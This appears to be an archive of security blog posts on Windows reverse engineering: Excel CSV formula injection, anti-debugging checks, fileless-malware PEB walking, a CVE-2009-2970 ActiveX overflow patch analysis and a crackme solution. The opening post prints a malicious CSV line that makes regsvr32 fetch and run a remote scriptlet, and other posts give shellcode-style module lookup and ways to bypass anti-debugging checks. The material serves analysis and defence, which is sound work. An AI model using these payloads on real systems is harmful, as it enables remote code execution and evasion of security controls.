Microsoft Excel CSV code execution/injection method
Yesterday Davo Cossa mentioned this technique in one of his tweets. The idea behind it is to exploit how Microsoft Excel parses CSV files and evaluates formulas in order to achieve remote code execution by tricking the user into opening a specially crafted CSV file. You can see the example malicious CSV below.
fillerText1,fillerText2,fillerText3,=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''
And here is how it works. When Microsoft Excel parses a CSV file it places each comma-separated field in its own cell. So, the first cell will be “fillerText1”, the second cell “fillerText2”, and so on. However, for the last field in this example it will try to insert the following into a cell.
=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''
As you probably already know, Microsoft Excel treats the “=” as a special character to indicate the beginning of a formula. So, here is what the above code will actually try to execute on the target system.
regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll
What this does is call the Microsoft Register Server (regsvr32) in silent mode (/s), in unregister mode (/u), without calling DllRegisterServer (/n), and with the URL passed as the command-line string for DllInstall (/i). The DLL being loaded is “scrobj.dll”, Microsoft’s Script Component Runtime, which is asked to fetch and execute the Windows Scriptlet file located at http://RemoteIPAddress/SCTLauncher.sct. Because regsvr32 is a signed binary that ships with the Windows operating system, it is typically allowed by AppLocker whitelists and can therefore execute any script from the fetched file on the victim’s system. There is a full analysis of this AppLocker bypass technique here.
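Since the whole trick depends on a field starting with a formula character, here is a minimal sketch of how one could flag such fields before a CSV file ever reaches Excel. The function names are mine, the splitter is deliberately naive (no quoted fields), and besides the “=” discussed above I am also treating “+”, “-” and “@” as formula prefixes, which means plain negative numbers will be flagged too.

```c
#include <stdbool.h>
#include <stddef.h>

/* True when a field starts with a character that a spreadsheet may treat as
 * the beginning of a formula. '=' is the one used in the example above;
 * '+', '-' and '@' are extra prefixes added as an assumption of this sketch. */
static bool csv_field_looks_like_formula(const char *field)
{
    return *field == '=' || *field == '+' || *field == '-' || *field == '@';
}

/* Counts the suspicious fields in one CSV line.
 * Naive splitter: it cuts on every comma and ignores quoting. */
static size_t csv_count_formula_fields(const char *line)
{
    size_t hits = 0;
    const char *start = line;

    for (const char *p = line; ; p++) {
        if (*p == ',' || *p == '\0') {
            if (csv_field_looks_like_formula(start))
                hits++;
            if (*p == '\0')
                break;
            start = p + 1;   /* next field begins after the comma */
        }
    }
    return hits;
}
```

Running csv_count_formula_fields() on the malicious line shown earlier would report one suspicious field, the last one.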
The CheckRemoteDebuggerPresent() anti-debugging technique
Disclaimer: I am not an experienced Windows guy. I know just the basics and still learning.
A few days ago I published Reverse Engineering isDebuggerPresent() which is the most widely used anti-debugging method in Windows malware. Here I will be going through another very common anti-debugging method in Windows malware, the CheckRemoteDebuggerPresent() from kernel32.dll.
BOOL WINAPI CheckRemoteDebuggerPresent( _In_ HANDLE hProcess, _Inout_ PBOOL pbDebuggerPresent );
Basically, the function will set “pbDebuggerPresent” to TRUE or FALSE depending on whether the process referenced by the “hProcess” handle is being debugged. The function’s own return value only reports whether the call succeeded. Malware authors typically use this in a way similar to what you see below. The following code retrieves the current process’ handle via GetCurrentProcess() and then uses CheckRemoteDebuggerPresent() to discover if a debugger is attached to this process.
#include <windows.h>

int main(void)
{
    BOOL HasDebugPort = FALSE;

    /* The return value only tells us that the query worked;
       the debugger state comes back in HasDebugPort. */
    if (CheckRemoteDebuggerPresent(GetCurrentProcess(), &HasDebugPort) && HasDebugPort) {
        ExitProcess(0); // Running in ring-3 debugger
    }

    // Running outside ring-3 debugger
    return 0;
}
If you recall, what isDebuggerPresent() does is return the value of “Process->PEB->BeingDebugged”. CheckRemoteDebuggerPresent() is slightly different. Instead of looking at this flag, it checks if the process has a non-zero debug port, which means that the process has a Ring-3 debugger attached to it. Below you can see how CheckRemoteDebuggerPresent() actually works in KernelBase.dll.
Unlike isDebuggerPresent(), CheckRemoteDebuggerPresent() uses NtQueryInformationProcess() to obtain the “ProcessDebugPort” value of the process. Below you can see some example/pseudo code on how NtQueryInformationProcess() retrieves that information.
NTSTATUS NTAPI
NtQueryInformationProcess(IN HANDLE ProcessHandle,
                          IN PROCESSINFOCLASS ProcessInformationClass,
                          OUT PVOID ProcessInformation,
                          IN ULONG ProcessInformationLength,
                          OUT PULONG ReturnLength OPTIONAL)
{
    ...
    Status = ObReferenceObjectByHandle(ProcessHandle,
                                       PROCESS_QUERY_INFORMATION,
                                       PsProcessType,
                                       PreviousMode,
                                       (PVOID*)&Process,
                                       NULL);
    ...
    *(PHANDLE)ProcessInformation = (Process->DebugPort ? (HANDLE)-1 : NULL);
    ...
}
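To make the relationship between the two layers easier to follow, here is a small portable model of it. Nothing here is the real Windows code: the structure and the model_* names are made up for this sketch, and only the “non-NULL debug port becomes -1” logic is taken from the pseudo code above.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for the kernel's process object; only the field the
 * text talks about is modeled. */
struct model_process {
    void *debug_port;   /* non-NULL while a debug object is attached */
};

/* Models the ProcessDebugPort query: the caller never sees the real port,
 * only -1 (debug port present) or 0 (no debug port). */
static intptr_t model_query_debug_port(const struct model_process *p)
{
    return p->debug_port ? (intptr_t)-1 : 0;
}

/* Models CheckRemoteDebuggerPresent(): the return value reports whether the
 * query worked, the out-parameter reports the debugger state. */
static bool model_check_remote_debugger_present(const struct model_process *p,
                                                bool *debugger_present)
{
    if (p == NULL || debugger_present == NULL)
        return false;               /* the call itself failed */

    *debugger_present = model_query_debug_port(p) != 0;
    return true;                    /* success, whatever the debugger state */
}
```

The point of the model is that a caller has to look at the out-parameter, not at the return value, to learn whether a debugger is attached.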
To defeat this anti-debugging technique we can use methods similar to the ones we described for isDebuggerPresent(). Namely, here are a few example methods to do this:
- Patch the comparison of the return value of CheckRemoteDebuggerPresent() in the malware code
- Patch the malware to jump over the CheckRemoteDebuggerPresent() check
- Patch the malware to NOP the CheckRemoteDebuggerPresent() check
- Set a breakpoint after the NtQueryInformationProcess() call and update its return value for ProcessDebugPort to 0
- Pre-load/hook a DLL that overrides NtQueryInformationProcess() and always returns 0 for ProcessDebugPort
Fileless malware and PEB enumeration
I was reverse engineering a fileless malware sample (meaning the malicious payload lives only in the system’s memory) and I came across this technique which apparently is quite popular in fileless malware. So, this post is about how fileless malware takes advantage of PEB (Process Environment Block) enumeration to work. You can see the PEB structure as defined in the Winternl.h header file below.
typedef struct _PEB {
  BYTE Reserved1[2];
  BYTE BeingDebugged;
  BYTE Reserved2[1];
  PVOID Reserved3[2];
  PPEB_LDR_DATA Ldr;
  PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
  BYTE Reserved4[104];
  PVOID Reserved5[52];
  PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
  BYTE Reserved6[128];
  PVOID Reserved7[1];
  ULONG SessionId;
} PEB, *PPEB;
When malware injects a payload into memory it needs to somehow find which API calls to use. This means it has to find where those are located in memory. A common method to do this is using the PEB, whose address is always stored at the same location: on 32-bit Windows, at offset 0x30 from the base of the “fs” segment. The assembly instructions you see below will load the PEB pointer to the “edx” register.
xor edx, edx            ; Make sure edx is empty
mov edx, fs:[edx+30h]   ; Get the address of PEB
Now that the malware has a starting point, it can take advantage of the “Ldr” pointer which is stored in the PEB. “Ldr” is technically a pointer to a “PEB_LDR_DATA” structure which contains a linked list (InMemoryOrderModuleList) of the loaded modules. Here you can see how this is defined in the Winternl.h header file.
typedef struct _PEB_LDR_DATA {
  BYTE Reserved1[8];
  PVOID Reserved2[3];
  LIST_ENTRY InMemoryOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;
And below you can see the equivalent assembly instructions that will help us find the “Ldr” pointer. We are just using the PEB pointer that we discovered above and add 0x0C to it which will lead us to the location of the “Ldr” pointer, and we store its value in the “edx” register.
xor edx, edx            ; Make sure edx is empty
mov edx, fs:[edx+30h]   ; Get the address of PEB
mov edx, [edx+0Ch]      ; Get the address of PEB->Ldr
Within the “Ldr” as you saw from the type definition above, there is a doubly-linked list named “InMemoryOrderModuleList”. This doubly-linked list contains the modules that are loaded in this process. Once again, the “LIST_ENTRY” data type is defined in the Winternl.h header file and you can see it here.
typedef struct _LIST_ENTRY {
  struct _LIST_ENTRY *Flink;
  struct _LIST_ENTRY *Blink;
} LIST_ENTRY, *PLIST_ENTRY;
The code can now just iterate through the “InMemoryOrderModuleList” linked list to enumerate the loaded modules that are available. You can see the equivalent assembly code below which is similar to the above. However, now the “edx” register points to the first module in the list (specifically, to the list links embedded in its “LDR_DATA_TABLE_ENTRY” structure). By following the “Flink” pointer of each entry we can iterate through all of them.
xor edx, edx            ; Make sure edx is empty
mov edx, fs:[edx+30h]   ; Get the address of PEB
mov edx, [edx+0Ch]      ; Get the address of PEB->Ldr
mov edx, [edx+14h]      ; Get the PEB->Ldr->InMemoryOrderModuleList
From this point on, the malware can identify the modules it needs to use and reference them directly. This method is very popular in fileless malware as it can be used to dynamically discover loaded modules when a payload is injected in memory and executed via another process. For example, a common method is to use the third entry of the list (which includes the base address of kernel32.dll) and enumerate the export table of kernel32.dll to find LoadLibrary() and start loading arbitrary DLLs required for its operation. Here is some sample code that gets the base address of kernel32.dll which can be used to discover LoadLibrary() to be able to load modules dynamically.
xor edx, edx            ; Make sure edx is empty
mov edx, fs:[edx+30h]   ; Get the address of PEB
mov edx, [edx+0Ch]      ; Get the address of PEB->Ldr
mov edx, [edx+14h]      ; Get the PEB->Ldr->InMemoryOrderModuleList
mov edx, [edx]          ; Second entry in PEB->Ldr->InMemoryOrderModuleList
mov edx, [edx]          ; Third entry (kernel32.dll) in PEB->Ldr->InMemoryOrderModuleList
mov edx, [edx+10h]      ; The base address of the third entry (kernel32.dll)
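If the pointer chasing in the last listing feels a bit magical, the following portable sketch models the same walk in C. The structures are simplified stand-ins that I made up for the example (the real “LDR_DATA_TABLE_ENTRY” has many more fields); what matters is that the list links live inside each module record, so the module base is found at a fixed distance from the link. With 4-byte pointers that distance works out to 0x10 in this model, matching the last instruction of the listing.

```c
#include <stddef.h>
#include <stdint.h>

/* Same shape as LIST_ENTRY from the text. */
struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
};

/* Hypothetical, trimmed-down model of a loader entry: three sets of list
 * links followed by the module base address. */
struct model_module {
    struct list_entry in_load_order_links;
    struct list_entry in_memory_order_links;
    struct list_entry in_init_order_links;
    void *dll_base;
};

/* Follow flink n times starting from the list head (n = 1 is the first
 * module, n = 3 the third), like the chain of "mov edx, [edx]". */
static const struct list_entry *nth_entry(const struct list_entry *head,
                                          unsigned n)
{
    const struct list_entry *e = head;
    while (n-- > 0)
        e = e->flink;
    return e;
}

/* Recover the module base from a pointer to the in_memory_order_links field,
 * the same idea as the final "mov edx, [edx+10h]". */
static void *module_base_from_link(const struct list_entry *link)
{
    const char *p = (const char *)link;
    p += offsetof(struct model_module, dll_base)
       - offsetof(struct model_module, in_memory_order_links);
    return *(void * const *)p;
}
```

Calling module_base_from_link(nth_entry(&head, 3)) on a list built this way returns the base stored in the third record.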
Reverse Engineering isDebuggerPresent()
Disclaimer: I am not an experienced Windows guy. I know just the basics and still learning.
There have been tons of articles on how to bypass isDebuggerPresent(), the most widely used anti-debugging method in Windows. However, here we will go a little bit into what isDebuggerPresent() does internally. As we can read in Microsoft’s documentation, it comes with a very simple prototype from Kernel32 library.
BOOL WINAPI IsDebuggerPresent(void);
What we need to know is that isDebuggerPresent() is designed to perform just one task: return a non-zero value if the current process is running in a user-mode debugger, and zero if it is not. If we load up the Kernel32 DLL (Dynamic-Link Library), we can quickly find the export of this routine. Basically, it is just a jump to an internal offset from the DS (Data Segment) register.
This makes sense as Microsoft has moved a lot of the functionality from kernel32.dll and advapi32.dll to kernelbase.dll. So, if we load kernelbase.dll we will quickly locate the actual code behind isDebuggerPresent() which consists of a very simple operation.
Literally, the entire isDebuggerPresent() function is three assembly instructions. First, it loads the value stored at fs:30h into the EAX register, then it loads the byte at address EAX+2 (zero-extended) into EAX, and lastly, it returns with that value in EAX.
mov eax, large fs:30h
movzx eax, byte ptr [eax+2]
retn
The question now becomes, what does the FS segment register store in offset 0x30? The answer is well known to any Windows people out there. In Windows, the FS segment register points to the Win32 TIB (Windows 32-bit Thread Information Block), a data structure that describes the currently running thread. At offset 0x30 we have the linear address of the Process Environment Block (PEB). If you are interested in the rest of the TIB you can check the full mapping on Wikipedia.
This means that the first instruction retrieves the address of PEB data structure. The second instruction fetches the value that is stored two Bytes after the beginning of the PEB structure. Reading Microsoft’s documentation on PEB solves this mystery as this is where “BeingDebugged” is located. So, technically isDebuggerPresent() is returning whatever value “BeingDebugged” has.
typedef struct _PEB {
  BYTE Reserved1[2];
  BYTE BeingDebugged;
  BYTE Reserved2[1];
  PVOID Reserved3[2];
  PPEB_LDR_DATA Ldr;
  PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
  BYTE Reserved4[104];
  PVOID Reserved5[52];
  PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
  BYTE Reserved6[128];
  PVOID Reserved7[1];
  ULONG SessionId;
} PEB, *PPEB;
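Just to convince ourselves that “two bytes after the beginning of the PEB” really is “BeingDebugged”, here is a tiny portable model. It only reproduces the first four bytes of the structure above, and the model_* names are mine, so treat it as an illustration of the offset arithmetic rather than the real thing.

```c
#include <stddef.h>
#include <stdint.h>

/* Leading bytes of the PEB as shown in the typedef above; everything after
 * Reserved2 is left out of this model. */
struct model_peb {
    uint8_t reserved1[2];
    uint8_t being_debugged;
    uint8_t reserved2[1];
};

/* Equivalent of "movzx eax, byte ptr [eax+2]": read one byte at offset 2
 * from the PEB base and zero-extend it to 32 bits. */
static uint32_t model_is_debugger_present(const void *peb_base)
{
    return ((const uint8_t *)peb_base)[2];
}
```

Since offsetof(struct model_peb, being_debugged) is 2, reading the byte at offset 2 and reading the field are the same operation.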
The question now becomes, what can set _PEB.BeingDebugged to a non-zero value and why. The answer to this is the debugging API of Windows. When a request is made to attach a debugger to a process, such as DebugActiveProcess(), it will result in a call to DbgUiDebugActiveProcess() from the Windows Native API, known as NTDLL. Here is the equivalent disassembled code.
What we care about as you can easily guess, is the call to _NtDebugActiveProcess() function. This internal API call results in a system call (hex value 0x800C5) to “NtDebugActiveProcess” which is invoked via Wow64SystemServiceCall(). This is part of the NT Operating System kernel (ntoskrnl.exe), also known as the Windows kernel image. If we load the ntoskrnl.exe to IDA and find this system call’s code, we will see exactly how “BeingDebugged” is set.
As you can see “NtDebugActiveProcess” system call will eventually result in the invocation of DbgkpSetProcessDebugObject() function. A function that takes four arguments and is defined as you see below in the Windows internal kernel API prototype.
NTSTATUS NTAPI DbgkpSetProcessDebugObject(IN PEPROCESS Process, IN PDEBUG_OBJECT DebugObject, IN NTSTATUS MsgStatus, IN PETHREAD LastThread )
This routine is also part of ntoskrnl.exe and what is interesting to us is at the very bottom of its code. You can see the exact snippet below. What we care about is the call to the DbgkpMarkProcessPeb() function.
As it is suggested by its name, DbgkpMarkProcessPeb() will update the PEB of the process that it received as an argument to mark it as under debugging. Below you can see exactly where the “BeingDebugged” flag is set to TRUE (or FALSE) within DbgkpMarkProcessPeb().
The above code updates “Process->PEB->BeingDebugged” based on the value of “DebugPort”. If the “DebugPort” is set, it will set “Process->PEB->BeingDebugged” to TRUE, otherwise to FALSE. The “DebugPort” is a field of the kernel’s process object (EPROCESS), not of the PEB, and it is initialized if the parent process (like a debugger) or the kernel was asked to associate this process with a debug object. You can see the function that does this below.
Basically, this means that any time a debug object is created on the kernel for a process, the DbgkpMarkProcessPeb() will be invoked to ensure that “BeingDebugged” is set to TRUE in the PEB data structure of this specific process. Then, isDebuggerPresent() will simply fetch that value and return it to the user-space when called. As I mentioned in the intro, the scope of this post was not how to defeat the isDebuggerPresent() anti-debugging technique, but to understand how it works. Knowing the above should be sufficient to give you some ideas on how to do it. Just for reference, below are some ideas with a few different methods to bypass this check.
- NOP the call to isDebuggerPresent() (source: StackOverflow)
- Modify the PEB.BeingDebugged value (source: aldeid)
- Set the byte at [EAX+2] to 0 (FALSE) before the check
- Set the third byte of the PEB (the structure that FS:30h points to) to 0 (FALSE)
CVE-2009-2970: UiTV UiPlayer ActiveX Stack Overflow
This bug was discovered and reported by Yu Yang of NSFOCUS Security Team. As the author states in the advisory, this issue affects UiCheck.dll releases prior to 1.0.0.7. So, I used version 1.0.0.6 of that DLL and let’s see what I found…
.text:10002390
.text:10002390 ; int __stdcall sub_10002390(int, LPCWSTR lpWideCharStr, int)
.text:10002390 sub_10002390 proc near ; DATA XREF: .rdata:1001391C↓o
.text:10002390 ; .rdata:10013F24↓o
.text:10002390
.text:10002390 var_4A8 = byte ptr -4A8h
.text:10002390 CodePage = dword ptr -4A4h
.text:10002390 puLen = dword ptr -4A0h
.text:10002390 lpBuffer = dword ptr -49Ch
.text:10002390 var_498 = dword ptr -498h
.text:10002390 dwHandle = dword ptr -494h
.text:10002390 SubBlock = byte ptr -490h
.text:10002390 SubKey = byte ptr -390h
.text:10002390 ValueName = byte ptr -290h
.text:10002390 var_194 = byte ptr -194h
.text:10002390 var_190 = byte ptr -190h
.text:10002390 var_11B = byte ptr -11Bh
.text:10002390 Data = byte ptr -110h
.text:10002390 Str = byte ptr -0Ch
.text:10002390 var_4 = dword ptr -4
.text:10002390 lpWideCharStr = dword ptr 0Ch
.text:10002390 arg_8 = dword ptr 10h
.text:10002390
This is the buggy handling routine and here is how it starts its code…
.text:10002390 push ebp
.text:10002391 lea ebp, [esp-428h]
.text:10002398 sub esp, 4A8h
.text:1000239E mov eax, dword_10017360
.text:100023A3 push ebx
.text:100023A4 push esi
.text:100023A5 push edi
.text:100023A6 mov [ebp+428h+var_4], eax
.text:100023AC call Target
.text:100023B2 mov ebx, [ebp+428h+lpWideCharStr]
.text:100023B8 mov [ebp+428h+CodePage], eax
.text:100023BB xor eax, eax
.text:100023BD cmp ebx, eax
.text:100023BF mov [ebp+428h+dwHandle], eax
.text:100023C2 jz short loc_10002404
First of all, EBP is loaded with ‘[esp-428h]’ and the stack pointer is lowered by 0x4A8 bytes to make room for the local variables. Then the EAX register is loaded with ‘dword_10017360’, which is stored in the local variable ‘[ebp+428h+var_4]’ just before the ‘Target’ function is called (this looks like a stack cookie rather than an argument of ‘Target’). When ‘Target’ returns, EBX is loaded with ‘lpWideCharStr’ and the returned value is stored in ‘CodePage’. The EAX register is zeroed out using a simple XOR and compared against EBX, and ‘dwHandle’ is initialized to zero. If ‘lpWideCharStr’ is NULL, it will perform a short jump to ‘loc_10002404’ which will initialize EDX like this (the ‘lea ebx, [ebx+0]’ does not change EBX, it is just padding):
.text:10002404
.text:10002404 loc_10002404: ; CODE XREF: sub_10002390+32↑j
.text:10002404 ; sub_10002390+70↑j
.text:10002404 lea edx, [ebp+428h+ValueName]
.text:1000240A lea ebx, [ebx+0]
Assuming that this is not the case, the following will be executed:
.text:100023C4 push ebx ; lpString
.text:100023C5 call ds:lstrlenW
.text:100023CB lea edi, [eax+eax+2]
.text:100023CF mov eax, edi
.text:100023D1 add eax, 3
.text:100023D4 and eax, 0FFFFFFFCh
.text:100023D7 call __alloca_probe
This code performs a call to the Unicode lstrlenW() routine, passing EBX (which contains lpWideCharStr) to it as the lpString argument. It loads ‘[eax+eax+2]’, that is twice the returned length plus two bytes for the terminator, into the EDI register and then moves that value back to EAX and adds 3 to it. Finally, it masks the result with 0xFFFFFFFC, which together with the addition rounds the size up to a multiple of four, and calls __alloca_probe() to reserve that many bytes on the stack.
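The size arithmetic above is easier to check with a few numbers, so here is a small sketch of it in C. The function name is made up; the three operations are the ones from the listing.

```c
#include <stdint.h>

/* Size handed to __alloca_probe() for a wide string of wide_len characters. */
static uint32_t conversion_buffer_size(uint32_t wide_len)
{
    uint32_t bytes = wide_len + wide_len + 2;   /* lea edi, [eax+eax+2] */
    return (bytes + 3u) & 0xFFFFFFFCu;          /* add eax, 3 / and eax, 0FFFFFFFCh */
}
```

For example, a 4-character string needs 10 bytes, which is rounded up to 12, while a 5-character string needs exactly 12 and stays at 12.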
Let’s continue…
.text:100023DC mov esi, esp
.text:100023DE test esi, esi
.text:100023E0 jz short loc_10002402
So, ESI is initialized with ESP’s value and if the test check returns zero, it will jump to ‘loc_10002402’ which is a simple code that zeroes EAX out like this:
.text:10002402
.text:10002402 loc_10002402: ; CODE XREF: sub_10002390+50↑j
.text:10002402 xor eax, eax
However, if this is not the case, which means that we have enough space on the stack, a call to WideCharToMultiByte() will be performed like this:
.text:100023E2 mov eax, [ebp+428h+CodePage]
.text:100023E5 push 0 ; lpUsedDefaultChar
.text:100023E7 push 0 ; lpDefaultChar
.text:100023E9 push edi ; cchMultiByte
.text:100023EA push esi ; lpMultiByteStr
.text:100023EB push 0FFFFFFFFh ; cchWideChar
.text:100023ED push ebx ; lpWideCharStr
.text:100023EE push 0 ; dwFlags
.text:100023F0 push eax ; CodePage
.text:100023F1 mov byte ptr [esi], 0
.text:100023F4 call ds:WideCharToMultiByte
.text:100023FA neg eax
.text:100023FC sbb eax, eax
.text:100023FE and eax, esi
.text:10002400 jmp short loc_10002404
.text:10002402 ; ---------------------------------------------------------------------------
The returned value (stored in EAX) is then turned into a mask. NEG sets the carry flag when EAX is non-zero, and the subsequent SBB subtracts EAX from itself with borrow, leaving 0xFFFFFFFF if the call returned something and 0 if it returned zero. The logical AND with ESI therefore leaves either the address of the converted string or NULL in EAX. The short jump to ‘loc_10002404’ was described earlier, it will just execute this:
.text:10002404 loc_10002404: ; CODE XREF: sub_10002390+32↑j
.text:10002404 ; sub_10002390+70↑j
.text:10002404 lea edx, [ebp+428h+ValueName]
.text:1000240A lea ebx, [ebx+0]
.text:10002410
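The NEG/SBB/AND sequence that follows the WideCharToMultiByte() call is a common compiler idiom for a branch-free “pointer or NULL” selection. A rough C equivalent, with a name I made up, could look like this:

```c
#include <stdint.h>

/* Returns buffer when ret is non-zero and 0 otherwise, without branching
 * in the original assembly. */
static uint32_t select_buffer_if_success(uint32_t ret, uint32_t buffer)
{
    /* neg eax sets CF when eax != 0; sbb eax, eax then yields 0 - CF */
    uint32_t mask = (ret != 0) ? 0xFFFFFFFFu : 0u;
    return mask & buffer;                       /* and eax, esi */
}
```

So after these three instructions EAX holds the address in ESI if the conversion wrote something, and zero if it did not.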
And here is the code you’ve been waiting for…
.text:10002410 loc_10002410: ; CODE XREF: sub_10002390+88↓j
.text:10002410 mov cl, [eax]
.text:10002412 inc eax
.text:10002413 mov [edx], cl
.text:10002415 inc edx
.text:10002416 test cl, cl
.text:10002418 jnz short loc_10002410
This is a simple loop that copies ‘[eax]’ to ‘cl’ and ‘cl’ to the location pointed to by EDX, and repeats as long as ‘cl’ is not NULL. It is similar to the following (in C pseudo-code):
char *edx = ValueName;   /* destination, set up in loc_10002404 */
char *eax = converted;   /* multi-byte copy of lpWideCharStr (the name is mine) */
char cl;
do {
    cl = *eax++;
    *edx++ = cl;
} while (cl != 0);
So, it will continue copying regardless of the destination buffer’s size. However, ‘ValueName’ has a fixed size, as you can read from the stack frame (or the offsets generated by IDA in the above paste): it starts at -290h and the next variable, ‘var_194’, starts at -194h, which leaves 0xFC (252) bytes. The code that follows is of no interest. It performs some GetModuleHandleA(), GetModuleFileNameA(), GetFileVersionInfoSizeA() etc. calls. In version 1.0.0.7 of the DLL, this code was changed like this:
.text:10002415 loc_10002415: ; CODE XREF: sub_10002390+81↑j
.text:10002415 push 32h ; Count
.text:10002417 push eax ; Source
.text:10002418 lea ecx, [ebp+428h+ValueName]
.text:1000241E push ecx ; Dest
.text:1000241F call _strncpy
.text:10002424 add esp, 0Ch
.text:10002427 push offset aUicheck_dll ; "UiCheck.dll"
.text:1000242C call ds:GetModuleHandleA
As you can read, instead of using that simple copy loop that they did, they use _strncpy() in a manner similar to:
_strncpy(ValueName, lpWideCharStr, 0x32);
Quite a simple bug, and if you spend some time on that DLL you’ll see that it has a few more vulnerabilities. Anyway, this post was a result of my first attempt to use N. Economou’s TurboDiff which is a really awesome plugin for IDA. :)
cyclops’s NTS-Crackme10 Solution
I found my solution for this crackme while cleaning up an old USB flash drive. So, here is my solution to this really cool crackme.
When you first run you’ll see something similar to this:
After browsing the code in IDA for a few minutes I spotted the reason why it was exiting when I was attempting to run it in a debugger. The reason is:
.text:0040129C loc_40129C: ; CODE XREF: sub_401260+36j
.text:0040129C push offset LibFileName ; "kernel32.dll"
.text:004012A1 call ds:LoadLibraryA
.text:004012A7 push offset ProcName ; "IsDebuggerPresent"
.text:004012AC push eax ; hModule
.text:004012AD call ds:GetProcAddress
.text:004012B3 call eax
.text:004012B5 test eax, eax
.text:004012B7 jz short loc_4012BD
.text:004012B9 push 0 ; nExitCode
.text:004012BB call edi ; PostQuitMessage
.text:004012BD
As you can see, it uses IsDebuggerPresent() from kernel32.dll and if this returns FALSE, which means EAX will be zero, it will jump to loc_4012BD. Otherwise, it will just execute PostQuitMessage(0). There are a number of ways to overcome this protection; the simplest one is to just patch the binary so that the “jz” is always taken. Another common way is to attach to the process after this code has been executed. In this case, attaching is easier since this check is performed only once during the initialization of the process. Just start the process normally in your Windows and then attach your favorite debugger to it! :)
And now, it is time to fill every function that “sounds interesting” with breakpoints. Probably the most interesting one was CWnd::GetDlgItemTextA(int, char *, int). From MSDN we can see that this is an MFC (Microsoft Foundation Class) library routine, which is definitely not surprising. Just have a look at that binary and you will see that it makes wide use of MFC. So… After entering a username/password like AAAAAAAA/BBBBBBBB and pressing F7 quite a few times I saw this:
.text:004014BA loc_4014BA: ; CODE XREF: sub_401490+21j
.text:004014BA nop
.text:004014BB pop eax
.text:004014BC lea eax, [ebp+var_24]
.text:004014BF push 1Fh
.text:004014C1 push eax
.text:004014C2 push 3E8h
.text:004014C7 call ?GetDlgItemTextA@CWnd@@QBEHHPADH@Z ; CWnd::GetDlgItemTextA(int,char *,int)
.text:004014CC mov edi, eax
.text:004014CE push ecx
.text:004014CF push eax
.text:004014D0 rdtsc
.text:004014D2 xor ecx, ecx
.text:004014D4 add ecx, eax
.text:004014D6 rdtsc
.text:004014D8 sub eax, ecx
.text:004014DA cmp eax, 0FFFh
.text:004014DF jb short loc_4014E8
.text:004014E1 add [ebp+var_4], 3025h
.text:004014E8
The buffer that EAX points to holds our username, as we can see from the stack at that moment:
Stack[00000488]:0012F884 var_24 db 41h
Stack[00000488]:0012F885 db 41h ; A
Stack[00000488]:0012F886 db 41h ; A
Stack[00000488]:0012F887 db 41h ; A
Stack[00000488]:0012F888 db 41h ; A
Stack[00000488]:0012F889 db 41h ; A
Stack[00000488]:0012F88A db 41h ; A
Stack[00000488]:0012F88B db 41h ; A
The code invokes CWnd::GetDlgItemTextA() in a way similar to: GetDlgItemTextA(0x03E8, username, 0x1F). The arguments are pushed right to left, so the first value (1000 in decimal) is the ID of the dialog control and the last one is the maximum length, which is 31 in decimal. The subsequent mov edi, eax instruction stores the return value (EAX) of GetDlgItemTextA(), which is the number of characters copied not including the NULL termination, in the EDI register.
The next snippet makes use of rdtsc to retrieve the processor timestamp, a 64-bit value that is returned in EDX:EAX. It zeroes out ECX by XOR’ing it with itself and then adds to it the value of EAX (the lower half returned by rdtsc). It invokes rdtsc once again and then subtracts the value saved in ECX from the new value in EAX. If the difference is below 0xFFF (which is 4095 in decimal), it skips the add instruction since it jumps to loc_4014E8 which is the immediately next location.
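To make the timing check a bit more concrete, here is how I would model it in plain C. The function name and the idea of passing the two timestamp halves as arguments are mine; the threshold, the unsigned comparison (jb) and the 0x3025 value come straight from the listing.

```c
#include <stdint.h>

/* Returns the amount that gets added to var_4 for a given pair of rdtsc
 * readings (low 32 bits only, as in the listing). */
static uint32_t timing_penalty(uint32_t tsc_low_first, uint32_t tsc_low_second)
{
    uint32_t elapsed = tsc_low_second - tsc_low_first;   /* sub eax, ecx */
    return (elapsed < 0xFFFu) ? 0u : 0x3025u;            /* jb skips the add */
}
```

Because the subtraction is done on 32-bit unsigned values, the check still behaves when the low half of the counter wraps around between the two readings.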
If the jump is not taken, which means that more time than expected passed between the two rdtsc instructions, then it adds 0x3025 (12325 in decimal) to a local variable. This is another nice little anti-debugging feature. It measures the execution time between the two rdtsc instructions and if it is longer than expected (probably because of some debugger single stepping around) then it changes its behavior. Once again, there are countless ways to bypass this. You can patch it to add 0, you can NOP it, you can make the jump always be taken, or you can simply set a breakpoint after that code, for example at loc_4014E8, so that no single-stepping overhead is added. I patched it to add zero and now, after bypassing this, let’s move to the loc_4014E8 code.
.text:004014E8 loc_4014E8: ; CODE XREF: sub_401490+4Fj
.text:004014E8 nop
.text:004014E9 pop eax
.text:004014EA pop ecx
.text:004014EB lea ecx, [ebp+var_48]
.text:004014EE push 11h
.text:004014F0 push ecx
.text:004014F1 push 3E9h
.text:004014F6 mov ecx, esi
.text:004014F8 call ?GetDlgItemTextA@CWnd@@QBEHHPADH@Z ; CWnd::GetDlgItemTextA(int,char *,int)
Here it just invokes CWnd::GetDlgItemTextA() in a way similar to: GetDlgItemTextA(1001, password, 17). So… Continuing with this function we have:
.text:004014FD cmp edi, 5
.text:00401500 jle short loc_40152F
.text:00401502 cmp eax, 5
.text:00401505 jle short loc_40152F
If you recall, EDI has the length of the username not including the NULL termination and from the previous call, EAX has the length of the password. If either of these two is 5 characters or fewer, it will jump to loc_40152F. This is something you really don’t want to happen since this code simply ends this function like this:
.text:0040152F loc_40152F: ; CODE XREF: sub_401490+70j
.text:0040152F ; sub_401490+75j ...
.text:0040152F pop edi
.text:00401530 pop esi
.text:00401531 mov esp, ebp
.text:00401533 pop ebp
.text:00401534 retn
Assuming that our credentials are more than 5 characters, then the code that follows is this:
.text:00401507 mov edx, [ebp+var_4]
.text:0040150A lea eax, [ebp+var_48]
.text:0040150D push edx
.text:0040150E lea ecx, [ebp+var_24]
